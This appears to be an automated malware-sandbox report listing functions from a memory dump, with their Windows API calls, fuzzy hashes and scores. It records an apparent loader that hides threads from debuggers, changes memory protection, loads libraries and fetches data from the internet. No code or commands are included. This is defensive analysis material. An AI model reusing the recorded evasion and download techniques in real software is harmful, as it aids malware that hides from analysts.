NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6

Strings

1.!T, xrefs: 00A0098F

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: 19e274166ea5fa084147c276319d6b7c18fae9068a5571abdb105e8979e04ce0
Instruction ID: 580cc00000d58aac86033fd3f5e7002f1e2f970341ffbf5428fa7ebedd6ce12d
Opcode Fuzzy Hash: 19e274166ea5fa084147c276319d6b7c18fae9068a5571abdb105e8979e04ce0
Instruction Fuzzy Hash: EE318DB074430FAEFF106E255E75BDF2692AF55794F618225FD82AB1C5EB70CC458201

Uniqueness

Uniqueness Score: -1.00%

Function 00A008C1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00A06869: LoadLibraryA.KERNEL32(?,0000BF39,?,000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A069C0

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6

Strings

1.!T, xrefs: 00A0098F

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: 4b17d4617f0b62e35a4c302ca941192c335748a6240d90ac0db71c41956f52d5
Instruction ID: 80ec967eaf45b1b6c672ba65bb861a80c56d1ef5eade1dde48c340fe01dba65c
Opcode Fuzzy Hash: 4b17d4617f0b62e35a4c302ca941192c335748a6240d90ac0db71c41956f52d5
Instruction Fuzzy Hash: 54318DB074030FAAFF106E255EB1BDF2692AF55794F948225FD42AB2C1EB70CC458201

Uniqueness

Uniqueness Score: -1.00%

Function 00A04CF1, Relevance: 1.5, APIs: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A04D1E

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c35accafe891d2e0324c4f92edd6284b56b98d5907f879649e50d8947c803743
Instruction ID: b26095ba5b0b27388c3b7a0666b1dda740b21f36026d817adcc4a764693fa3b6
Opcode Fuzzy Hash: c35accafe891d2e0324c4f92edd6284b56b98d5907f879649e50d8947c803743
Instruction Fuzzy Hash: 7DD02BF110638C4BD35276205492A017F252FD2341798D05583D14F3F2DA004F05D362

Uniqueness

Uniqueness Score: -1.00%

Function 00A07CCA, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,00A0781B,00000040,00A0097F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A07CE5

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 970a84c6a405dd6d8e2d58dc37069c960f8056ff7656fce3f40b3debb6875070
Instruction ID: 8655de409669d1bc4cbbaabd8e7ccbd66007367519567cfe67ca7f303647eabb
Opcode Fuzzy Hash: 970a84c6a405dd6d8e2d58dc37069c960f8056ff7656fce3f40b3debb6875070
Instruction Fuzzy Hash: 71C012F02140002E65048928CD44C2B72AA86C4728B10C72CB431A22CCC530DC044035

Uniqueness

Uniqueness Score: -1.00%

Function 00A01457, Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00A04338: LdrInitializeThunk.NTDLL ref: 00A04D1E

Sleep.KERNEL32(00002710,00000000,00000000,?,?,?,?,?,00000000,00000000,00000050,00000369,?,00A06747,000000FF,00000007), ref: 00A015C5

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: InitializeSleepThunk
String ID:
API String ID: 145592009-0
Opcode ID: 522384ff5964ee6ac304c5a471eae4d498e4b4773cb5d91aaf3d9d8e75822f85
Instruction ID: e95575e3df3e8aa104f7c3b604d5c5387ed6a5455d0191e4680188050764dbaf
Opcode Fuzzy Hash: 522384ff5964ee6ac304c5a471eae4d498e4b4773cb5d91aaf3d9d8e75822f85
Instruction Fuzzy Hash: 1301B17064034DEBEF312F64AE46BDD3B77AF80340F904515FD8A5A096D7779A90AA02

Uniqueness

Uniqueness Score: -1.00%

Function 00A044B1, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100networklibrarynativeCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6
InternetOpenA.WININET(00A04C5C,00000000,00000000,00000000,00000000,00A0153B,00000000,00000000,?,?,?,?,?,00000000,00000000,00000050), ref: 00A044BF
InternetOpenUrlA.WININET(?,00000004,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00A045A1
LoadLibraryA.KERNEL32(?,0000BF39,?,000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A069C0

Strings

8j, xrefs: 00A044B2

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen$InformationLibraryLoadThread
String ID: 8j
API String ID: 349944081-1660458225
Opcode ID: 284be8c8f2b6268306d6b8d828e8292d36acec82445f10f25e4caaa60c4437ba
Instruction ID: f4180d335110ebd15bd794bebc1defa520172276be8561f284031e0379fb90e4
Opcode Fuzzy Hash: 284be8c8f2b6268306d6b8d828e8292d36acec82445f10f25e4caaa60c4437ba
Instruction Fuzzy Hash: A731B5B014038FAFEF315E109D55BFA3666AF19740F944025EE469B581E7728D84EB11

Uniqueness

Uniqueness Score: -1.00%

Function 00A047B2, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 171libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A06869: LoadLibraryA.KERNEL32(?,0000BF39,?,000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A069C0

LdrInitializeThunk.NTDLL ref: 00A04D1E

Strings

0={,, xrefs: 00A048FF

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: InitializeLibraryLoadThunk
String ID: 0={,
API String ID: 3353482560-63937952
Opcode ID: 0aed3b69258ab2056187f5463afe4cb8a0b8d04b4371a6474cc9dfa57f1daa5d
Instruction ID: 8a1a8aaa858fecf31477a07f61f73a086167fce7b8faf9d51fa87f58007366eb
Opcode Fuzzy Hash: 0aed3b69258ab2056187f5463afe4cb8a0b8d04b4371a6474cc9dfa57f1daa5d
Instruction Fuzzy Hash: F65184B0A0024F8BDF14AF62A1A16DE3763AF59354FA0C51AEC56473C5DB30C866CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A0841D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET ref: 00A087BF

Strings

4`f, xrefs: 00A0841E

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: FileInternetRead
String ID: 4`f
API String ID: 778332206-3373392880
Opcode ID: 3873e8c0b81c32bb8e7cfb4b7491c0444c8afa1a4aa71c3bb5a8f35e2cd0320c
Instruction ID: 7a2e8bb998178ccfacbe59b7b7539ea754de9dc0e749687fff3bcd21dc67203a
Opcode Fuzzy Hash: 3873e8c0b81c32bb8e7cfb4b7491c0444c8afa1a4aa71c3bb5a8f35e2cd0320c
Instruction Fuzzy Hash: FE312C3054560EDEDF398F18E4547E532A26F323A0FE58229D8C1A70D4DB7E88C8DA49

Uniqueness

Uniqueness Score: -1.00%

Function 00A084F9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97filenativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6
InternetReadFile.WININET ref: 00A087BF

Strings

4`f, xrefs: 00A084FA

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: FileInformationInternetReadThread
String ID: 4`f
API String ID: 2277484718-3373392880
Opcode ID: e14174895fab20f9e60cee548ce9f8b8eda97bdd13326fa50a191c210bf7a2eb
Instruction ID: 3da4b03a0f3df2ec22c6f698183d9c08ca84bedb93f7e731a565b2bf22fee9ad
Opcode Fuzzy Hash: e14174895fab20f9e60cee548ce9f8b8eda97bdd13326fa50a191c210bf7a2eb
Instruction Fuzzy Hash: 1831293064120E9EDB358F18E5687A532A26F323A0FE58229D8C5670D4EB7D88C8DA49

Uniqueness

Uniqueness Score: -1.00%

Function 00A082E9, Relevance: 1.6, APIs: 1, Instructions: 125filenativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6
InternetReadFile.WININET ref: 00A087BF

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: FileInformationInternetReadThread
String ID:
API String ID: 2277484718-0
Opcode ID: 5d12f69d6cf4f8e9507535c494c90b4a87b385fad0a268a7d476f11df3f87287
Instruction ID: ac0e1afdee3ab0be153663508965bc037964bdfe5a663d7e6ac6683708610df9
Opcode Fuzzy Hash: 5d12f69d6cf4f8e9507535c494c90b4a87b385fad0a268a7d476f11df3f87287
Instruction Fuzzy Hash: 5331F93054520FDEDF259F14A4647E532B26F323A0FE58129D8C1971D4EB6E8888DA4A

Uniqueness

Uniqueness Score: -1.00%

Function 00A08335, Relevance: 1.6, APIs: 1, Instructions: 121filenativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6
InternetReadFile.WININET ref: 00A087BF

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: FileInformationInternetReadThread
String ID:
API String ID: 2277484718-0
Opcode ID: a41cce6a209d8dc03749a6267ed022ce5309e33cc3e61269a2256968fb444ee9
Instruction ID: cda3a2054431dccde4a4ecf9e39c836f89670004c8cda1912c8b3e2d416a980b
Opcode Fuzzy Hash: a41cce6a209d8dc03749a6267ed022ce5309e33cc3e61269a2256968fb444ee9
Instruction Fuzzy Hash: D331183050520FDEDF259F18E4547E532B26F323A0FE58229D8C2970D4EB7E8888DA4A

Uniqueness

Uniqueness Score: -1.00%

Function 00A0837D, Relevance: 1.6, APIs: 1, Instructions: 118filenativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6
InternetReadFile.WININET ref: 00A087BF

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: FileInformationInternetReadThread
String ID:
API String ID: 2277484718-0
Opcode ID: 04e605e453a89b36810480c5b27ec1ec0f2dcba75ee16ffb927fb9656d0c2563
Instruction ID: ff0abb738fc9cc69a8441039a7b857a765d50a90880091abe949db1062844128
Opcode Fuzzy Hash: 04e605e453a89b36810480c5b27ec1ec0f2dcba75ee16ffb927fb9656d0c2563
Instruction Fuzzy Hash: FF31393050520FDEDF259F18E4647E532B26F323A0FE58229D8C1A70D4DB7E8888DA4A

Uniqueness

Uniqueness Score: -1.00%

Function 00A083CD, Relevance: 1.6, APIs: 1, Instructions: 114filenativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6
InternetReadFile.WININET ref: 00A087BF

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: FileInformationInternetReadThread
String ID:
API String ID: 2277484718-0
Opcode ID: efba3d684a8c1b0bbfae893d62f20d02a39c064640412ffd954223db182acb42
Instruction ID: 5ea356846c9c136eb4711e3a242d40d395cb4a5e311fe0bc67af37c59db23738
Opcode Fuzzy Hash: efba3d684a8c1b0bbfae893d62f20d02a39c064640412ffd954223db182acb42
Instruction Fuzzy Hash: AB31283054560FDEDF349F18E5647E532B2AF323A0FE58229D8C1971D4EB7E8888DA49

Uniqueness

Uniqueness Score: -1.00%

Function 00A084B9, Relevance: 1.6, APIs: 1, Instructions: 98filenativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6
InternetReadFile.WININET ref: 00A087BF

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: FileInformationInternetReadThread
String ID:
API String ID: 2277484718-0
Opcode ID: bd0637cd8aaea0148877ca964bf834c3a6bc0cb2a0a9e3ddb930f77c727a2bba
Instruction ID: bc651a7c61c586fe8194f07ae802a51c2b651fb417b17b94fd3cf47e68b329da
Opcode Fuzzy Hash: bd0637cd8aaea0148877ca964bf834c3a6bc0cb2a0a9e3ddb930f77c727a2bba
Instruction Fuzzy Hash: 74313E3054520E9EDF354F18E4587E532A26F333A0FE58229D8C5570D4DB7D88C8DA49

Uniqueness

Uniqueness Score: -1.00%

Function 00A08595, Relevance: 1.6, APIs: 1, Instructions: 95filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET ref: 00A087BF

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: f579757a5ffd0f953f3160fd78013b75b5c34e8f5a3e4ce5d80c4f170fc5a70e
Instruction ID: 720dcf78581d4fb6649c1b1f973a9c90f866d878cc9c2700f5d9bf822a73f595
Opcode Fuzzy Hash: f579757a5ffd0f953f3160fd78013b75b5c34e8f5a3e4ce5d80c4f170fc5a70e
Instruction Fuzzy Hash: E6215C3060520E9EEF348F18E4687A532A26F333E0FE49228C8C1971D5DB7D88C8D649

Uniqueness

Uniqueness Score: -1.00%

Function 00A0853D, Relevance: 1.6, APIs: 1, Instructions: 95filenativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6
InternetReadFile.WININET ref: 00A087BF

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: FileInformationInternetReadThread
String ID:
API String ID: 2277484718-0
Opcode ID: 39e14d19053de279b61ab43c6cc1b4598367123e86465046a1aea9cb8eb08316
Instruction ID: cb7177e26dc7a39948ae60dd59d86d7c4af36753fbec5adbaaea3482321e98e5
Opcode Fuzzy Hash: 39e14d19053de279b61ab43c6cc1b4598367123e86465046a1aea9cb8eb08316
Instruction Fuzzy Hash: F2212B3064170E9EDF354F18E4687A536A26F333E0FE48228D8C1970D4EB7D88C8DA49

Uniqueness

Uniqueness Score: -1.00%

Function 00A044F0, Relevance: 1.6, APIs: 1, Instructions: 83librarynativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6
InternetOpenUrlA.WININET(?,00000004,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00A045A1
LoadLibraryA.KERNEL32(?,0000BF39,?,000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A069C0

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: InformationInternetLibraryLoadOpenThread
String ID:
API String ID: 4206461664-0
Opcode ID: fb4f8202093794b9c53f13963322c7437ec393fcbadfde7fe4220546fac036a2
Instruction ID: cc66fd70fd3a82ee8ab332c561dcced6621472d8c1e93626a5efb22c5bcaa925
Opcode Fuzzy Hash: fb4f8202093794b9c53f13963322c7437ec393fcbadfde7fe4220546fac036a2
Instruction Fuzzy Hash: 9921F4B014038BEFDF318E60ED50FEA3266AF19740F908039EE469A581E7728D44EB12

Uniqueness

Uniqueness Score: -1.00%

Function 00A08631, Relevance: 1.6, APIs: 1, Instructions: 80filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET ref: 00A087BF

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 232613db01979063949772390e2fca84814cbf54f50b369dda8bc1c79ba108e0
Instruction ID: 38a01192969c169ac37f36a3d05d5eb529d2f05c2f5c3650a8ce02f140172ff9
Opcode Fuzzy Hash: 232613db01979063949772390e2fca84814cbf54f50b369dda8bc1c79ba108e0
Instruction Fuzzy Hash: 5221293064120E9EDB398F18E4687A137A26F333E0FE99268C8C0570D4EB7DC8C8D649

Uniqueness

Uniqueness Score: -1.00%

Function 00A08681, Relevance: 1.6, APIs: 1, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET ref: 00A087BF

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: c89b7f073c8e617f28fdc8b5546835b083b5fb686cfbc9845b0b0d2f65dc99ad
Instruction ID: 2192f890eb75ccbd36e8538451f90a054c88d1e924a6e32dc0f10a5af42384b2
Opcode Fuzzy Hash: c89b7f073c8e617f28fdc8b5546835b083b5fb686cfbc9845b0b0d2f65dc99ad
Instruction Fuzzy Hash: 0121A530A4120E9EDB398F18D5687A576A26F327E0FD8D268D8C1970D4EB79C8C8D649

Uniqueness

Uniqueness Score: -1.00%

Function 00A04555, Relevance: 1.6, APIs: 1, Instructions: 73librarynativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6
InternetOpenUrlA.WININET(?,00000004,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00A045A1
LoadLibraryA.KERNEL32(?,0000BF39,?,000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A069C0

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: InformationInternetLibraryLoadOpenThread
String ID:
API String ID: 4206461664-0
Opcode ID: a71fc1a960392ad2984b62d6d31bb3a15338b37f0c460ca25d03d47d0304f14f
Instruction ID: c3c6eb1afed28d0b389eaca73657681c1648b0733349721b9a65904bb3f8fca0
Opcode Fuzzy Hash: a71fc1a960392ad2984b62d6d31bb3a15338b37f0c460ca25d03d47d0304f14f
Instruction Fuzzy Hash: 8B21D5B014034BAEEF319E50DDA0FFA3266AF09710FA08035EE4697581E3729D80EA12

Uniqueness

Uniqueness Score: -1.00%

Function 00A06937, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,0000BF39,?,000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A069C0

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3b271e7f26900a596da1bb16f016fdacc450e3f741fb9cff7c8ff909c77d0c64
Instruction ID: 2c869ef7c22f6dd5cac02a0139d0383f1fc30f4d9a18805acf26ef345f9dca5e
Opcode Fuzzy Hash: 3b271e7f26900a596da1bb16f016fdacc450e3f741fb9cff7c8ff909c77d0c64
Instruction Fuzzy Hash: 4501496470839E2DEF1A7B747E1A7ED2AB09F017DCF09416EFC809A4C7DA20C4634252

Uniqueness

Uniqueness Score: -1.00%

Function 00A06869, Relevance: 1.5, APIs: 1, Instructions: 47libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,0000BF39,?,000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A069C0

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: acb5b4a6d251f03896b93008a78d82e49e6eb1b4708310bb5cb9a4ff0b1a6588
Instruction ID: 6a2a2a8d234b3bffbd55805415c442cdcef3e6d50cb690c18df717514ac0a227
Opcode Fuzzy Hash: acb5b4a6d251f03896b93008a78d82e49e6eb1b4708310bb5cb9a4ff0b1a6588
Instruction Fuzzy Hash: DFF0F66460031E6DEF143B657B097FE06B48F05BEDF04852DBC91660CBE734C0A70012

Uniqueness

Uniqueness Score: -1.00%

Function 00A068A9, Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,0000BF39,?,000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A069C0

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 677e6a2e3ec358b3bed89fc416adce09358de84d6c0531ad2e9d36a704d44ce1
Instruction ID: bd09edc7237b1baa8e3687ec2d3bc2f28dba75aec4cd5f9003677e704f2d929a
Opcode Fuzzy Hash: 677e6a2e3ec358b3bed89fc416adce09358de84d6c0531ad2e9d36a704d44ce1
Instruction Fuzzy Hash: DFF0CD6460031E69DF243B64BB197FE11A44F04BE9F04852DBC91A60CAEB3480A60002

Uniqueness

Uniqueness Score: -1.00%

Function 00A068F5, Relevance: 1.5, APIs: 1, Instructions: 42libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,0000BF39,?,000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A069C0

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6ed4bb098ba6db8135038c20c8b8c1e1734d21423db81039d775757c4f2952a4
Instruction ID: f53b28c521d13822c1078c1841ef62e3dc5a945b85048c7b49cf27feec7219d9
Opcode Fuzzy Hash: 6ed4bb098ba6db8135038c20c8b8c1e1734d21423db81039d775757c4f2952a4
Instruction Fuzzy Hash: CEF0BE6860071E6DEF243B69BB1A7EE11B48F04BE9F05852DBC91A64CBEB34C0A70502

Uniqueness

Uniqueness Score: -1.00%

Function 00A08789, Relevance: 1.5, APIs: 1, Instructions: 39filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET ref: 00A087BF

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: bd2825ebe7c32997c41d557ad6af637ca9f2f0933fe0deb69c17a649a5276e9a
Instruction ID: 2e1e44d7ab016a68dc067773f4e0b10f426c22b3613b5854e1ecf1a98536e912
Opcode Fuzzy Hash: bd2825ebe7c32997c41d557ad6af637ca9f2f0933fe0deb69c17a649a5276e9a
Instruction Fuzzy Hash: 2DF0E921B4120B0DDB2A9B2895653D427525E237D07E88224CCD0971D8F725C4C8C248

Uniqueness

Uniqueness Score: -1.00%

Function 00A069D8, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4db5169338fa1b3ceac0799a22f7e71f6894dd8b992c7dea54a0a3a92b410de
Instruction ID: 3fa3aa4d631a668759cd79365cf16cccba392bdbf7550283bff15e4f8ededa79
Opcode Fuzzy Hash: d4db5169338fa1b3ceac0799a22f7e71f6894dd8b992c7dea54a0a3a92b410de
Instruction Fuzzy Hash: 7DF055683047B20AEB0A9A3CA8241CA3B61AC012E874901AEE880CB3C7C631CC5343C5

Uniqueness

Uniqueness Score: -1.00%

Function 00A00829, Relevance: 1.5, APIs: 1, Instructions: 29nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(00A00866,?,00000000,?,?,?,?,?,00A00539), ref: 00A00841
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A009B6

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: EnumInformationThreadWindows
String ID:
API String ID: 1954852945-0
Opcode ID: dd46fab3c697fcc1623d1ef70310ec4253c16949264619a8d56ed501d74a6b00
Instruction ID: 28ffbe21b4bb50ad031d8c58ef4c1cc8b6f7a42b6b08c22420322b433e360e75
Opcode Fuzzy Hash: dd46fab3c697fcc1623d1ef70310ec4253c16949264619a8d56ed501d74a6b00
Instruction Fuzzy Hash: 58E0C039101345AFC611B934DCF8FD93744DB0A330F504500F456CB2D0D42204C0C700

Uniqueness

Uniqueness Score: -1.00%

Function 00A06991, Relevance: 1.5, APIs: 1, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,0000BF39,?,000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A069C0

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f5d1ad4516875e21b37315ebd9317e9244cfb7b8691cde71b8108f32c4d8e4ec
Instruction ID: 34cb1b8ab401db0b431a84a553fc63afc781c657953e1488c24f29dd644c9ba6
Opcode Fuzzy Hash: f5d1ad4516875e21b37315ebd9317e9244cfb7b8691cde71b8108f32c4d8e4ec
Instruction Fuzzy Hash: 6CE02B2060431F5AEB457F203A507D926E06E957C1F45412EAC804A5C3EA30C4534740

Uniqueness

Uniqueness Score: -1.00%

Function 00A06952, Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,0000BF39,?,000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A069C0

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 70c2bccf5a9d1b6c3535d368795d37cf1bab37b23b0b017433396927d42f96d0
Instruction ID: 09424050b3628ce620d9f726d9bcf574c134b254083d500649eba86360454694
Opcode Fuzzy Hash: 70c2bccf5a9d1b6c3535d368795d37cf1bab37b23b0b017433396927d42f96d0
Instruction Fuzzy Hash: 6CE08C6024471AAADB483E357B59BCE17B09E0A7D5F19862DBC942998AEB34C0A30654

Uniqueness

Uniqueness Score: -1.00%

Function 00A04338, Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A04D1E

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de87a3801d9617a615505dda871fed9bf073445dd2a8b3537f2422ff62efbff4
Instruction ID: dd5b5555eaaf2edc639aa299d48b2efa96844a58fa5a7651518f9e7631156d44
Opcode Fuzzy Hash: de87a3801d9617a615505dda871fed9bf073445dd2a8b3537f2422ff62efbff4
Instruction Fuzzy Hash: FBD02BB22083880AE155791055636453F322BD73807D8C18A85C10F3E7CF064E15A3A3

Uniqueness

Uniqueness Score: -1.00%

